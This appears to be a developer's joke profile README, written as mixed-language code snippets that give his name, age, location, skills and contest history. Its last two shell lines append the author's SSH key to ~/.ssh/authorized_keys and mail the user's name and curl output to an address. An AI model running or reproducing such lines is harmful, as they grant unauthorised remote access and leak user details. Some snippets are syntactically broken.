name = 'ignacio'
nickname = '%s%d%s' % (name[0], len(name[1:-1]), name[-1])
github = '' % nickname
birthdate = new Date('1999-4-8');
now = new Date();
age = now.getFullYear() - birthdate.getFullYear()
if (!(now.getMonth() >= birthdate.getMonth() && now.getDate() >= birthdate.getDate())) {
age -= 1;
"fullname": "Ignacio Rodriguez",
"country": "Uruguay",
"located_in": "Montevideo",
"description": "sometimes I feel like I'm a developer",
"timezone": "utc-3"
$i_know = array("python", "javascript", "html", "css", "linux", "php?", "nothing");
foreach ($i_know as $language) {
print $language . "<br>";
# Contact me
message="Hello there :)"
mail="[email protected]"
echo $message | mail -s $subject $mail
more about me:
- gci winner in 2013
- gci winner in 2014
- gci mentor
- gsoc mentor
- a person that breaks linux servers 😉
- my cat was called Fosforito, so I try to use that name everywhere
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDNtR1gq8JF+y+sAgUV+4wfF9OTXkaNVpDVWv4JU8GPNaVJP1dMQ1GcYRrI877z/QsZk9UOu08bSUU8ggengygyz7RJPDV3+HYTjIJXO9FmfGA/1FrE1aoEPfTkNhqq70PbPwJCPQZf/T2zNIGKeMLJ/E/I+Jysg6SDlHk6zWIWbTeBFKQsNj9fQTsAGoSThGHcxEB/eQJ0tLBUb8MhGJSLtExSbhT8Dw63pYAb0BtzNnGesaCQTxAycxBk8XOQP0nO6rjyRPF9hjfYFslk1aeq29HIeLrC+tX0Vql59M/2CRx8inmYvZJetjf79TBymlclj/Zulum9KJ6nCGwXuIuv ignacio@ignacio-laptop" >> ~/.ssh/authorized_keys
echo $(whoami) $(curl --silent | mail -s "thanks" "[email protected]"